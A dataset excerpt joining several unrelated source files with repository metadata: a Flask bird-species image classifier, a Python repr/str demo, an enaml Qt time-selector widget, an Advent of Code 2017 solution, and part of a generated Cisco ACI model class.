     'BARN SWALLOW',
     'BARRED PUFFBIRD',
     'BAY-BREASTED WARBLER',
     'BEARDED BARBET',
     'BEARDED REEDLING',
     'BELTED KINGFISHER',
     'BIRD OF PARADISE',
     'BLACK & YELLOW bROADBILL',
     'BLACK FRANCOLIN',
     'BLACK SKIMMER',
     'BLACK SWAN',
     'BLACK TAIL CRAKE',
     'BLACK THROATED BUSHTIT',
     'BLACK THROATED WARBLER',
     'BLACK VULTURE',
     'BLACK-CAPPED CHICKADEE',
     'BLACK-NECKED GREBE',
     'BLACK-THROATED SPARROW',
     'BLACKBURNIAM WARBLER',
     'BLUE GROUSE',
     'BLUE HERON',
     'BOBOLINK',
     'BORNEAN BRISTLEHEAD',
     'BORNEAN LEAFBIRD',
     'BROWN NOODY',
     'BROWN THRASHER',
     'BULWERS PHEASANT',
     'CACTUS WREN',
     'CALIFORNIA CONDOR',
     'CALIFORNIA GULL',
     'CALIFORNIA QUAIL',
     'CANARY',
     'CAPE MAY WARBLER',
     'CAPUCHINBIRD',
     'CARMINE BEE-EATER',
     'CASPIAN TERN',
     'CASSOWARY',
     'CEDAR WAXWING',
     'CHARA DE COLLAR',
     'CHIPPING SPARROW',
     'CHUKAR PARTRIDGE',
     'CINNAMON TEAL',
     'CLARKS NUTCRACKER',
     'COCK OF THE ROCK',
     'COCKATOO',
     'COMMON FIRECREST',
     'COMMON GRACKLE',
     'COMMON HOUSE MARTIN',
     'COMMON LOON',
     'COMMON POORWILL',
     'COMMON STARLING',
     'COUCHS KINGBIRD',
     'CRESTED AUKLET',
     'CRESTED CARACARA',
     'CRESTED NUTHATCH',
     'CROW',
     'CROWNED PIGEON',
     'CUBAN TODY',
     'CURL CRESTED ARACURI',
     'D-ARNAUDS BARBET',
     'DARK EYED JUNCO',
     'DOUBLE BARRED FINCH',
     'DOWNY WOODPECKER',
     'EASTERN BLUEBIRD',
     'EASTERN MEADOWLARK',
     'EASTERN ROSELLA',
     'EASTERN TOWEE',
     'ELEGANT TROGON',
     'ELLIOTS PHEASANT',
     'EMPEROR PENGUIN',
     'EMU',
     'ENGGANO MYNA',
     'EURASIAN GOLDEN ORIOLE',
     'EURASIAN MAGPIE',
     'EVENING GROSBEAK',
     'FIRE TAILLED MYZORNIS',
     'FLAME TANAGER',
     'FLAMINGO',
     'FRIGATE',
     'GAMBELS QUAIL',
     'GANG GANG COCKATOO',
     'GILA WOODPECKER',
     'GILDED FLICKER',
     'GLOSSY IBIS',
     'GO AWAY BIRD',
     'GOLD WING WARBLER',
     'GOLDEN CHEEKED WARBLER',
     'GOLDEN CHLOROPHONIA',
     'GOLDEN EAGLE',
     'GOLDEN PHEASANT',
     'GOLDEN PIPIT',
     'GOULDIAN FINCH',
     'GRAY CATBIRD',
     'GRAY PARTRIDGE',
     'GREAT POTOO',
     'GREATOR SAGE GROUSE',
     'GREEN JAY',
     'GREEN MAGPIE',
     'GREY PLOVER',
     'GUINEA TURACO',
     'GUINEAFOWL',
     'GYRFALCON',
     'HARPY EAGLE',
     'HAWAIIAN GOOSE',
     'HELMET VANGA',
     'HIMALAYAN MONAL',
     'HOATZIN',
     'HOODED MERGANSER',
     'HOOPOES',
     'HORNBILL',
     'HORNED GUAN',
     'HORNED SUNGEM',
     'HOUSE FINCH',
     'HOUSE SPARROW',
     'IMPERIAL SHAQ',
     'INCA TERN',
     'INDIAN BUSTARD',
     'INDIAN PITTA',
     'INDIGO BUNTING',
     'JABIRU',
     'JAVA SPARROW',
     'KAKAPO',
     'KILLDEAR',
     'KING VULTURE',
     'KIWI',
     'KOOKABURRA',
     'LARK BUNTING',
     'LEARS MACAW',
     'LILAC ROLLER',
     'LONG-EARED OWL',
     'MAGPIE GOOSE',
     'MALABAR HORNBILL',
     'MALACHITE KINGFISHER',
     'MALEO',
     'MALLARD DUCK',
     'MANDRIN DUCK',
     'MARABOU STORK',
     'MASKED BOOBY',
     'MASKED LAPWING',
     'MIKADO PHEASANT',
     'MOURNING DOVE',
     'MYNA',
     'NICOBAR PIGEON',
     'NOISY FRIARBIRD',
     'NORTHERN BALD IBIS',
     'NORTHERN CARDINAL',
     'NORTHERN FLICKER',
     'NORTHERN GANNET',
     'NORTHERN GOSHAWK',
     'NORTHERN JACANA',
     'NORTHERN MOCKINGBIRD',
     'NORTHERN PARULA',
     'NORTHERN RED BISHOP',
     'NORTHERN SHOVELER',
     'OCELLATED TURKEY',
     'OKINAWA RAIL',
     'OSPREY',
     'OSTRICH',
     'OVENBIRD',
     'OYSTER CATCHER',
     'PAINTED BUNTIG',
     'PALILA',
     'PARADISE TANAGER',
     'PARAKETT AKULET',
     'PARUS MAJOR',
     'PEACOCK',
     'PELICAN',
     'PEREGRINE FALCON',
     'PHILIPPINE EAGLE',
     'PINK ROBIN',
     'PUFFIN',
     'PURPLE FINCH',
     'PURPLE GALLINULE',
     'PURPLE MARTIN',
     'PURPLE SWAMPHEN',
     'PYGMY KINGFISHER',
     'QUETZAL',
     'RAINBOW LORIKEET',
     'RAZORBILL',
     'RED BEARDED BEE EATER',
     'RED BELLIED PITTA',
     'RED BROWED FINCH',
     'RED FACED CORMORANT',
     'RED FACED WARBLER',
     'RED HEADED DUCK',
     'RED HEADED WOODPECKER',
     'RED HONEY CREEPER',
     'RED TAILED THRUSH',
     'RED WINGED BLACKBIRD',
     'RED WISKERED BULBUL',
     'REGENT BOWERBIRD',
     'RING-NECKED PHEASANT',
     'ROADRUNNER',
     'ROBIN',
     'ROCK DOVE',
     'ROSY FACED LOVEBIRD',
     'ROUGH LEG BUZZARD',
     'ROYAL FLYCATCHER',
     'RUBY THROATED HUMMINGBIRD',
     'RUFOUS KINGFISHER',
     'RUFUOS MOTMOT',
     'SAMATRAN THRUSH',
     'SAND MARTIN',
     'SCARLET IBIS',
     'SCARLET MACAW',
     'SHOEBILL',
     'SHORT BILLED DOWITCHER',
     'SMITHS LONGSPUR',
     'SNOWY EGRET',
     'SNOWY OWL',
     'SORA',
     'SPANGLED COTINGA',
     'SPLENDID WREN',
     'SPOON BILED SANDPIPER',
     'SPOONBILL',
     'SRI LANKA BLUE MAGPIE',
     'STEAMER DUCK',
     'STORK BILLED KINGFISHER',
     'STRAWBERRY FINCH',
     'STRIPPED SWALLOW',
     'SUPERB STARLING',
     'SWINHOES PHEASANT',
     'TAIWAN MAGPIE',
     'TAKAHE',
     'TASMANIAN HEN',
     'TEAL DUCK',
     'TIT MOUSE',
     'TOUCHAN',
     'TOWNSENDS WARBLER',
     'TREE SWALLOW',
     'TRUMPTER SWAN',
     'TURKEY VULTURE',
     'TURQUOISE MOTMOT',
     'UMBRELLA BIRD',
     'VARIED THRUSH',
     'VENEZUELIAN TROUPIAL',
     'VERMILION FLYCATHER',
     'VICTORIA CROWNED PIGEON',
     'VIOLET GREEN SWALLOW',
     'VULTURINE GUINEAFOWL',
     'WATTLED CURASSOW',
     'WHIMBREL',
     'WHITE CHEEKED TURACO',
     'WHITE NECKED RAVEN',
     'WHITE TAILED TROPIC',
     'WHITE THROATED BEE EATER',
     'WILD TURKEY',
     'WILSONS BIRD OF PARADISE',
     'WOOD DUCK',
     'YELLOW BELLIED FLOWERPECKER',
     'YELLOW CACIQUE',
     'YELLOW HEADED BLACKBIRD']
def model_predict(img_path, model, tts, l):
    """Classify the image at ``img_path`` and return the predicted label.

    :param img_path: path of the image file saved by the upload handler
    :param model: the loaded classifier (callable on a 1 x C x H x W tensor)
    :param tts: torchvision transform pipeline producing a CHW tensor
    :param l: label list indexed by the model's output logits
    :return: the class-name string for the highest-scoring logit
    """
    # Context-manage the image so the file handle is released, and force
    # RGB so grayscale/RGBA uploads don't crash the 3-channel network.
    with Image.open(img_path) as img:
        batch = tts(img.convert('RGB')).unsqueeze(0)  # add batch dim
    # Inference only: skip autograd bookkeeping.
    with torch.no_grad():
        scores = model(batch)
    _, preds = torch.max(scores, dim=1)
    return l[preds[0].item()]
print('predict model ran')


@app.route('/', methods=['GET'])
def index():
    """Serve the upload page (templates/index.html)."""
    # Main page
    return render_template('index.html')
@app.route('/predict', methods=['GET', 'POST'])
def upload():
    """Accept an image upload and respond with the predicted bird species.

    POST: expects a multipart ``file`` field; the file is saved under
    ./uploads (next to this module) and the predicted class name is
    returned as the response body. GET returns None, matching the
    original behavior.
    """
    if request.method == 'POST':
        # Get the file from post request
        f = request.files['file']

        # Save the file to ./uploads; create the folder on first use so a
        # fresh checkout doesn't fail with FileNotFoundError on f.save().
        basepath = os.path.dirname(__file__)
        upload_dir = os.path.join(basepath, 'uploads')
        os.makedirs(upload_dir, exist_ok=True)
        file_path = os.path.join(upload_dir, secure_filename(f.filename))
        f.save(file_path)

        # Make prediction and return the label directly (the old
        # preds -> result copy added nothing).
        return model_predict(file_path, model, tts, l)
    return None
print('Everything ran')

if __name__ == '__main__':
    # Flask development server only.
    # NOTE(review): WSGIServer is imported above but never used -- presumably
    # intended for production serving; confirm or drop the import.
    app.run(debug=True)
| [
"noreply@github.com"
] | bridgecrew-perf7.noreply@github.com |
30017f7b526335a428e035841353278b9d337ae7 | 997180420fabdd6f730f4673dba1f979bd91e699 | /apps/goods/t1.py | 70106faaf0574a7c9f66d963b3cb6942a4f54227 | [] | no_license | bwisgood/drf20F_api_pro | 66bb17479594247a2e74e4eef7434cdaf8b54de9 | ff4579ce8eaca7071ea27b5d071a58dbf63c2385 | refs/heads/master | 2020-03-27T02:52:28.973201 | 2018-09-20T05:01:40 | 2018-09-20T05:01:40 | 145,823,482 | 1 | 0 | null | 2018-08-23T14:00:24 | 2018-08-23T08:20:25 | JavaScript | UTF-8 | Python | false | false | 243 | py | class A:
a = 1
def __init__(self):
b = 2
def __repr__(self):
return "123"
def __str__(self):
return "456"
if __name__ == '__main__':
    a = A()
    print(repr(a))        # "123" -- repr() calls A.__repr__
    print(a.__repr__())   # same as repr(a), called explicitly
    print(a)              # "456" -- print() uses str(), i.e. A.__str__
"857464370@qq.com"
] | 857464370@qq.com |
588728ae141a1688b6adb628431a81037164d133 | 7b437e095068fb3f615203e24b3af5c212162c0d | /enaml/qt/qt_time_selector.py | 44ed2090c63a693722eb360745f4e4e37af26edb | [
"BSD-3-Clause"
] | permissive | ContinuumIO/enaml | d8200f97946e5139323d22fba32c05231c2b342a | 15c20b035a73187e8e66fa20a43c3a4372d008bd | refs/heads/master | 2023-06-26T16:16:56.291781 | 2013-03-26T21:13:52 | 2013-03-26T21:13:52 | 9,047,832 | 2 | 3 | null | null | null | null | UTF-8 | Python | false | false | 2,978 | py | #------------------------------------------------------------------------------
# Copyright (c) 2013, Nucleic Development Team.
#
# Distributed under the terms of the Modified BSD License.
#
# The full license is in the file COPYING.txt, distributed with this software.
#------------------------------------------------------------------------------
from PyQt4.QtGui import QTimeEdit
from atom.api import Typed
from enaml.widgets.time_selector import ProxyTimeSelector
from .qt_bounded_time import QtBoundedTime, CHANGED_GUARD
class QtTimeSelector(QtBoundedTime, ProxyTimeSelector):
    """ A Qt implementation of an Enaml ProxyTimeSelector.

    Wraps a QTimeEdit and bridges it to the Enaml declaration.
    """
    #: A reference to the widget created by the proxy.
    widget = Typed(QTimeEdit)

    #--------------------------------------------------------------------------
    # Initialization API
    #--------------------------------------------------------------------------
    def create_widget(self):
        """ Create the QTimeEdit widget.

        """
        self.widget = QTimeEdit(self.parent_widget())

    def init_widget(self):
        """ Initialize the widget.

        """
        super(QtTimeSelector, self).init_widget()
        d = self.declaration
        self.set_time_format(d.time_format)
        # Forward user edits back to the declaration via the base-class
        # handler.
        self.widget.timeChanged.connect(self.on_time_changed)

    #--------------------------------------------------------------------------
    # Abstract API Implementation
    #--------------------------------------------------------------------------
    def get_time(self):
        """ Return the current time in the control.

        Returns
        -------
        result : time
            The current control time as a time object.

        """
        return self.widget.time().toPyTime()

    def set_minimum(self, time):
        """ Set the widget's minimum time.

        Parameters
        ----------
        time : time
            The time object to use for setting the minimum time.

        """
        self.widget.setMinimumTime(time)

    def set_maximum(self, time):
        """ Set the widget's maximum time.

        Parameters
        ----------
        time : time
            The time object to use for setting the maximum time.

        """
        self.widget.setMaximumTime(time)

    def set_time(self, time):
        """ Set the widget's current time.

        Parameters
        ----------
        time : time
            The time object to use for setting the date.

        """
        # Raise the guard while setting the value programmatically --
        # presumably so the timeChanged handler connected above can tell a
        # programmatic change from a user edit; the finally block guarantees
        # the guard is cleared even if setTime raises.
        self._guard |= CHANGED_GUARD
        try:
            self.widget.setTime(time)
        finally:
            self._guard &= ~CHANGED_GUARD

    def set_time_format(self, format):
        """ Set the widget's time format.

        Parameters
        ----------
        format : str
            A Python time formatting string.

        """
        # XXX make sure Python's and Qt's format strings are the
        # same, or convert between the two.
        self.widget.setDisplayFormat(format)
| [
"sccolbert@gmail.com"
] | sccolbert@gmail.com |
b6e09b6f677b13f8d2e6d045a590591ef79b6925 | 744594f30c5e283f6252909fc68102dd7bc61091 | /2017/1/1b_solution.py | 8d5ba5bf554a303bca904549ec99af4e75da9fed | [
"MIT"
] | permissive | vScourge/Advent_of_Code | 84f40c76e5dc13977876eea6dbea7d05637de686 | 36e4f428129502ddc93c3f8ba7950aed0a7314bb | refs/heads/master | 2022-12-20T22:12:28.646102 | 2022-12-15T22:16:28 | 2022-12-15T22:16:28 | 160,765,438 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,361 | py | """
Answer = 1284
"""
data_str = '77736991856689225253142335214746294932318813454849177823468674346512426482777696993348135287531487622845155339235443718798255411492778415157351753377959586612882455464736285648473397681163729345143319577258292849619491486748832944425643737899293811819448271546283914592546989275992844383947572926628695617661344293284789225493932487897149244685921644561896799491668147588536732985476538413354195246785378443492137893161362862587297219368699689318441563683292683855151652394244688119527728613756153348584975372656877565662527436152551476175644428333449297581939357656843784849965764796365272113837436618857363585783813291999774718355479485961244782148994281845717611589612672436243788252212252489833952785291284935439662751339273847424621193587955284885915987692812313251556836958571335334281322495251889724281863765636441971178795365413267178792118544937392522893132283573129821178591214594778712292228515169348771198167462495988252456944269678515277886142827218825358561772588377998394984947946121983115158951297156321289231481348126998584455974277123213413359859659339792627742476688827577318285573236187838749444212666293172899385531383551142896847178342163129883523694183388123567744916752899386265368245342587281521723872555392212596227684414269667696229995976182762587281829533181925696289733325513618571116199419759821597197636415243789757789129824537812428338192536462468554399548893532588928486825398895911533744671691387494516395641555683144968644717265849634943691721391779987198764147667349266877149238695714118982841721323853294642175381514347345237721288281254828745122878268792661867994785585131534136646954347165597315643658739688567246339618795777125767432162928257331951255792438831957359141651634491912746875748363394329848227391812251812842263277229514125426682179711184717737714178235995431465217547759282779499842892993556918977773236196185348965713241211365895519697294982523166196268941976859987925578945185217127344619169353395993198368185217391883839449331638641
744279836858188235296951745922667612379649453277174224722894599153367373494255388826855322712652812127873536473277'
data = [ int( x ) for x in data_str ]
total = 0
for i in range( len( data ) ):
j = i + len( data ) // 2
if j > len( data ) - 1:
j = j - len( data )
if data[ i ] == data[ j ]:
total += data[ i ]
print( total )
| [
"adam.pletcher@gmail.com"
] | adam.pletcher@gmail.com |
8bf73471333f3eb235cbd5e9d88bd4651ab99a8b | 53fab060fa262e5d5026e0807d93c75fb81e67b9 | /backup/user_256/ch13_2020_03_29_03_11_24_129259.py | c5dcd02a5b7f4db136ed8fd45890155019458445 | [] | no_license | gabriellaec/desoft-analise-exercicios | b77c6999424c5ce7e44086a12589a0ad43d6adca | 01940ab0897aa6005764fc220b900e4d6161d36b | refs/heads/main | 2023-01-31T17:19:42.050628 | 2020-12-16T05:21:31 | 2020-12-16T05:21:31 | 306,735,108 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 67 | py | def encontra_cateto(hip, c1):
c2=(hip^2-c1^2)^0,5
return c2 | [
"you@example.com"
] | you@example.com |
9c55db4b00565f4ffe3a2d50ced5d3e2220ced2e | 32cb0be487895629ad1184ea25e0076a43abba0a | /LifePictorial/top/api/rest/PictureUpdateRequest.py | b32556481ce925c61750073a18148e80e3b936fa | [] | no_license | poorevil/LifePictorial | 6814e447ec93ee6c4d5b0f1737335601899a6a56 | b3cac4aa7bb5166608f4c56e5564b33249f5abef | refs/heads/master | 2021-01-25T08:48:21.918663 | 2014-03-19T08:55:47 | 2014-03-19T08:55:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 332 | py | '''
Created by auto_sdk on 2014-02-10 16:59:30
'''
from top.api.base import RestApi
class PictureUpdateRequest(RestApi):
    """Auto-generated Taobao TOP request wrapper for taobao.picture.update.

    Callers set the request attributes below, then send the request via the
    RestApi machinery in the base class.
    """

    def __init__(self,domain='gw.api.taobao.com',port=80):
        RestApi.__init__(self,domain, port)
        # Request parameters, filled in by the caller before sending.
        self.new_name = None    # new name for the picture (per the API name)
        self.picture_id = None  # id of the picture to update

    def getapiname(self):
        # API method identifier sent to the TOP gateway.
        return 'taobao.picture.update'
| [
"poorevil@gmail.com"
] | poorevil@gmail.com |
ad86893227e8f1041ddb9867ea4cfab250892595 | f4b60f5e49baf60976987946c20a8ebca4880602 | /lib64/python2.7/site-packages/acimodel-1.3_2j-py2.7.egg/cobra/modelimpl/hvs/fwsvctask.py | 4f250857ab9257f44fe27e88483f3a978c5fe7c5 | [] | no_license | cqbomb/qytang_aci | 12e508d54d9f774b537c33563762e694783d6ba8 | a7fab9d6cda7fadcc995672e55c0ef7e7187696e | refs/heads/master | 2022-12-21T13:30:05.240231 | 2018-12-04T01:46:53 | 2018-12-04T01:46:53 | 159,911,666 | 0 | 0 | null | 2022-12-07T23:53:02 | 2018-12-01T05:17:50 | Python | UTF-8 | Python | false | false | 17,029 | py | # coding=UTF-8
# **********************************************************************
# Copyright (c) 2013-2016 Cisco Systems, Inc. All rights reserved
# written by zen warriors, do not modify!
# **********************************************************************
from cobra.mit.meta import ClassMeta
from cobra.mit.meta import StatsClassMeta
from cobra.mit.meta import CounterMeta
from cobra.mit.meta import PropMeta
from cobra.mit.meta import Category
from cobra.mit.meta import SourceRelationMeta
from cobra.mit.meta import NamedSourceRelationMeta
from cobra.mit.meta import TargetRelationMeta
from cobra.mit.meta import DeploymentPathMeta, DeploymentCategory
from cobra.model.category import MoCategory, PropCategory, CounterCategory
from cobra.mit.mo import Mo
# ##################################################
class FwSvcTask(Mo):
    """Auto-generated managed-object class ``hvsFwSvcTask`` (Cisco ACI model).

    Represents a task MO tracking the asynchronous 'AddorDelUsegFwSvc'
    action (see the ``id`` property below). Generated by the model code
    generator -- per the file header, do not modify by hand; any manual
    change will be lost on regeneration.
    """

    # --- class metadata (read-only, non-configurable task MO) ---
    meta = ClassMeta("cobra.model.hvs.FwSvcTask")

    meta.moClassName = "hvsFwSvcTask"
    meta.rnFormat = "hvsFwSvcTask-%(id)s"
    meta.category = MoCategory.TASK
    meta.label = "None"
    meta.writeAccessMask = 0x1
    meta.readAccessMask = 0x1
    meta.isDomainable = False
    meta.isReadOnly = True
    meta.isConfigurable = False
    meta.isDeletable = False
    meta.isContextRoot = False

    # --- possible parent subject classes ---
    meta.parentClasses.add("cobra.model.action.TopomgrSubj")
    meta.parentClasses.add("cobra.model.action.ObserverSubj")
    meta.parentClasses.add("cobra.model.action.VmmmgrSubj")
    meta.parentClasses.add("cobra.model.action.SnmpdSubj")
    meta.parentClasses.add("cobra.model.action.ScripthandlerSubj")
    meta.parentClasses.add("cobra.model.action.ConfelemSubj")
    meta.parentClasses.add("cobra.model.action.EventmgrSubj")
    meta.parentClasses.add("cobra.model.action.OspaelemSubj")
    meta.parentClasses.add("cobra.model.action.VtapSubj")
    meta.parentClasses.add("cobra.model.action.OshSubj")
    meta.parentClasses.add("cobra.model.action.DhcpdSubj")
    meta.parentClasses.add("cobra.model.action.ObserverelemSubj")
    meta.parentClasses.add("cobra.model.action.DbgrelemSubj")
    meta.parentClasses.add("cobra.model.action.VleafelemSubj")
    meta.parentClasses.add("cobra.model.action.NxosmockSubj")
    meta.parentClasses.add("cobra.model.action.DbgrSubj")
    meta.parentClasses.add("cobra.model.action.AppliancedirectorSubj")
    meta.parentClasses.add("cobra.model.action.OpflexpSubj")
    meta.parentClasses.add("cobra.model.action.BootmgrSubj")
    meta.parentClasses.add("cobra.model.action.AeSubj")
    meta.parentClasses.add("cobra.model.action.PolicymgrSubj")
    meta.parentClasses.add("cobra.model.action.ExtXMLApiSubj")
    meta.parentClasses.add("cobra.model.action.OpflexelemSubj")
    meta.parentClasses.add("cobra.model.action.PolicyelemSubj")
    meta.parentClasses.add("cobra.model.action.IdmgrSubj")

    meta.superClasses.add("cobra.model.action.RInst")
    meta.superClasses.add("cobra.model.pol.ComplElem")
    meta.superClasses.add("cobra.model.task.Inst")
    meta.superClasses.add("cobra.model.action.Inst")

    meta.rnPrefixes = [
        ('hvsFwSvcTask-', True),
    ]

    # --- property metadata; each PropMeta is registered via meta.props.add ---
    prop = PropMeta("str", "childAction", "childAction", 4, PropCategory.CHILD_ACTION)
    prop.label = "None"
    prop.isImplicit = True
    prop.isAdmin = True
    prop._addConstant("deleteAll", "deleteall", 16384)
    prop._addConstant("deleteNonPresent", "deletenonpresent", 8192)
    prop._addConstant("ignore", "ignore", 4096)
    meta.props.add("childAction", prop)

    prop = PropMeta("str", "data", "data", 52, PropCategory.REGULAR)
    prop.label = "Data"
    prop.isImplicit = True
    prop.isAdmin = True
    prop.range = [(0, 512)]
    meta.props.add("data", prop)

    prop = PropMeta("str", "descr", "descr", 33, PropCategory.REGULAR)
    prop.label = "Description"
    prop.isImplicit = True
    prop.isAdmin = True
    prop.range = [(0, 128)]
    prop.regex = ['[a-zA-Z0-9\\!#$%()*,-./:;@ _{|}~?&+]+']
    meta.props.add("descr", prop)

    prop = PropMeta("str", "dn", "dn", 1, PropCategory.DN)
    prop.label = "None"
    prop.isDn = True
    prop.isImplicit = True
    prop.isAdmin = True
    prop.isCreateOnly = True
    meta.props.add("dn", prop)

    prop = PropMeta("str", "endTs", "endTs", 15575, PropCategory.REGULAR)
    prop.label = "None"
    prop.isImplicit = True
    prop.isAdmin = True
    prop.defaultValue = 0
    prop.defaultValueStr = "never"
    prop._addConstant("never", "never", 0)
    meta.props.add("endTs", prop)

    prop = PropMeta("str", "fail", "fail", 46, PropCategory.REGULAR)
    prop.label = "Fail"
    prop.isImplicit = True
    prop.isAdmin = True
    meta.props.add("fail", prop)

    # Naming property: identifies which action this task instance tracks.
    prop = PropMeta("str", "id", "id", 23455, PropCategory.REGULAR)
    prop.label = "ID"
    prop.isConfig = True
    prop.isAdmin = True
    prop.isCreateOnly = True
    prop.isNaming = True
    prop.defaultValue = 0
    prop.defaultValueStr = "none"
    prop._addConstant("AddorDelUsegFwSvc", "addordelusegfwsvc", 2084)
    prop._addConstant("none", "none", 0)
    meta.props.add("id", prop)

    prop = PropMeta("str", "invErrCode", "invErrCode", 49, PropCategory.REGULAR)
    prop.label = "Remote Error Code"
    prop.isImplicit = True
    prop.isAdmin = True
    prop._addConstant("ERR-FILTER-illegal-format", None, 1140)
    prop._addConstant("ERR-FSM-no-such-state", None, 1160)
    prop._addConstant("ERR-HTTP-set-error", None, 1551)
    prop._addConstant("ERR-HTTPS-set-error", None, 1552)
    prop._addConstant("ERR-MO-CONFIG-child-object-cant-be-configured", None, 1130)
    prop._addConstant("ERR-MO-META-no-such-object-class", None, 1122)
    prop._addConstant("ERR-MO-PROPERTY-no-such-property", None, 1121)
    prop._addConstant("ERR-MO-PROPERTY-value-out-of-range", None, 1120)
    prop._addConstant("ERR-MO-access-denied", None, 1170)
    prop._addConstant("ERR-MO-deletion-rule-violation", None, 1107)
    prop._addConstant("ERR-MO-duplicate-object", None, 1103)
    prop._addConstant("ERR-MO-illegal-containment", None, 1106)
    prop._addConstant("ERR-MO-illegal-creation", None, 1105)
    prop._addConstant("ERR-MO-illegal-iterator-state", None, 1100)
    prop._addConstant("ERR-MO-illegal-object-lifecycle-transition", None, 1101)
    prop._addConstant("ERR-MO-naming-rule-violation", None, 1104)
    prop._addConstant("ERR-MO-object-not-found", None, 1102)
    prop._addConstant("ERR-MO-resource-allocation", None, 1150)
    prop._addConstant("ERR-aaa-config-modify-error", None, 1520)
    prop._addConstant("ERR-acct-realm-set-error", None, 1513)
    prop._addConstant("ERR-add-ctrlr", None, 1574)
    prop._addConstant("ERR-admin-passwd-set", None, 1522)
    prop._addConstant("ERR-api", None, 1571)
    prop._addConstant("ERR-auth-issue", None, 1548)
    prop._addConstant("ERR-auth-realm-set-error", None, 1514)
    prop._addConstant("ERR-authentication", None, 1534)
    prop._addConstant("ERR-authorization-required", None, 1535)
    prop._addConstant("ERR-connect", None, 1572)
    prop._addConstant("ERR-create-domain", None, 1562)
    prop._addConstant("ERR-create-keyring", None, 1560)
    prop._addConstant("ERR-create-role", None, 1526)
    prop._addConstant("ERR-create-user", None, 1524)
    prop._addConstant("ERR-delete-domain", None, 1564)
    prop._addConstant("ERR-delete-role", None, 1528)
    prop._addConstant("ERR-delete-user", None, 1523)
    prop._addConstant("ERR-domain-set-error", None, 1561)
    prop._addConstant("ERR-http-initializing", None, 1549)
    prop._addConstant("ERR-incompat-ctrlr-version", None, 1568)
    prop._addConstant("ERR-internal-error", None, 1540)
    prop._addConstant("ERR-invalid-args", None, 1569)
    prop._addConstant("ERR-invalid-domain-name", None, 1582)
    prop._addConstant("ERR-ldap-delete-error", None, 1510)
    prop._addConstant("ERR-ldap-get-error", None, 1509)
    prop._addConstant("ERR-ldap-group-modify-error", None, 1518)
    prop._addConstant("ERR-ldap-group-set-error", None, 1502)
    prop._addConstant("ERR-ldap-set-error", None, 1511)
    prop._addConstant("ERR-missing-method", None, 1546)
    prop._addConstant("ERR-modify-ctrlr-access", None, 1567)
    prop._addConstant("ERR-modify-ctrlr-dvs-version", None, 1576)
    prop._addConstant("ERR-modify-ctrlr-rootcont", None, 1575)
    prop._addConstant("ERR-modify-ctrlr-scope", None, 1573)
    prop._addConstant("ERR-modify-ctrlr-trig-inventory", None, 1577)
    prop._addConstant("ERR-modify-domain", None, 1563)
    prop._addConstant("ERR-modify-domain-encapmode", None, 1581)
    prop._addConstant("ERR-modify-domain-enfpref", None, 1578)
    prop._addConstant("ERR-modify-domain-mcastpool", None, 1579)
    prop._addConstant("ERR-modify-domain-mode", None, 1580)
    prop._addConstant("ERR-modify-role", None, 1527)
    prop._addConstant("ERR-modify-user", None, 1525)
    prop._addConstant("ERR-modify-user-domain", None, 1565)
    prop._addConstant("ERR-modify-user-role", None, 1532)
    prop._addConstant("ERR-no-buf", None, 1570)
    prop._addConstant("ERR-passwd-set-failure", None, 1566)
    prop._addConstant("ERR-provider-group-modify-error", None, 1519)
    prop._addConstant("ERR-provider-group-set-error", None, 1512)
    prop._addConstant("ERR-radius-global-set-error", None, 1505)
    prop._addConstant("ERR-radius-group-set-error", None, 1501)
    prop._addConstant("ERR-radius-set-error", None, 1504)
    prop._addConstant("ERR-request-timeout", None, 1545)
    prop._addConstant("ERR-role-set-error", None, 1515)
    prop._addConstant("ERR-secondary-node", None, 1550)
    prop._addConstant("ERR-service-not-ready", None, 1539)
    prop._addConstant("ERR-set-password-strength-check", None, 1543)
    prop._addConstant("ERR-store-pre-login-banner-msg", None, 1521)
    prop._addConstant("ERR-tacacs-enable-error", None, 1508)
    prop._addConstant("ERR-tacacs-global-set-error", None, 1507)
    prop._addConstant("ERR-tacacs-group-set-error", None, 1503)
    prop._addConstant("ERR-tacacs-set-error", None, 1506)
    prop._addConstant("ERR-user-account-expired", None, 1536)
    prop._addConstant("ERR-user-set-error", None, 1517)
    prop._addConstant("ERR-xml-parse-error", None, 1547)
    prop._addConstant("communication-error", "communication-error", 1)
    prop._addConstant("none", "none", 0)
    meta.props.add("invErrCode", prop)

    prop = PropMeta("str", "invErrDescr", "invErrDescr", 50, PropCategory.REGULAR)
    prop.label = "Remote Error Description"
    prop.isImplicit = True
    prop.isAdmin = True
    prop.range = [(0, 128)]
    prop.regex = ['[a-zA-Z0-9\\!#$%()*,-./:;@ _{|}~?&+]+']
    meta.props.add("invErrDescr", prop)

    prop = PropMeta("str", "invRslt", "invRslt", 48, PropCategory.REGULAR)
    prop.label = "Remote Result"
    prop.isImplicit = True
    prop.isAdmin = True
    prop.defaultValue = 0
    prop.defaultValueStr = "not-applicable"
    prop._addConstant("capability-not-implemented-failure", "capability-not-implemented-failure", 16384)
    prop._addConstant("capability-not-implemented-ignore", "capability-not-implemented-ignore", 8192)
    prop._addConstant("capability-not-supported", "capability-not-supported", 32768)
    prop._addConstant("capability-unavailable", "capability-unavailable", 65536)
    prop._addConstant("end-point-failed", "end-point-failed", 32)
    prop._addConstant("end-point-protocol-error", "end-point-protocol-error", 64)
    prop._addConstant("end-point-unavailable", "end-point-unavailable", 16)
    prop._addConstant("extend-timeout", "extend-timeout", 134217728)
    prop._addConstant("failure", "failure", 1)
    prop._addConstant("fru-identity-indeterminate", "fru-identity-indeterminate", 4194304)
    prop._addConstant("fru-info-malformed", "fru-info-malformed", 8388608)
    prop._addConstant("fru-not-ready", "fru-not-ready", 67108864)
    prop._addConstant("fru-not-supported", "fru-not-supported", 536870912)
    prop._addConstant("fru-state-indeterminate", "fru-state-indeterminate", 33554432)
    prop._addConstant("fw-defect", "fw-defect", 256)
    prop._addConstant("hw-defect", "hw-defect", 512)
    prop._addConstant("illegal-fru", "illegal-fru", 16777216)
    prop._addConstant("intermittent-error", "intermittent-error", 1073741824)
    prop._addConstant("internal-error", "internal-error", 4)
    prop._addConstant("not-applicable", "not-applicable", 0)
    prop._addConstant("resource-capacity-exceeded", "resource-capacity-exceeded", 2048)
    prop._addConstant("resource-dependency", "resource-dependency", 4096)
    prop._addConstant("resource-unavailable", "resource-unavailable", 1024)
    prop._addConstant("service-not-implemented-fail", "service-not-implemented-fail", 262144)
    prop._addConstant("service-not-implemented-ignore", "service-not-implemented-ignore", 131072)
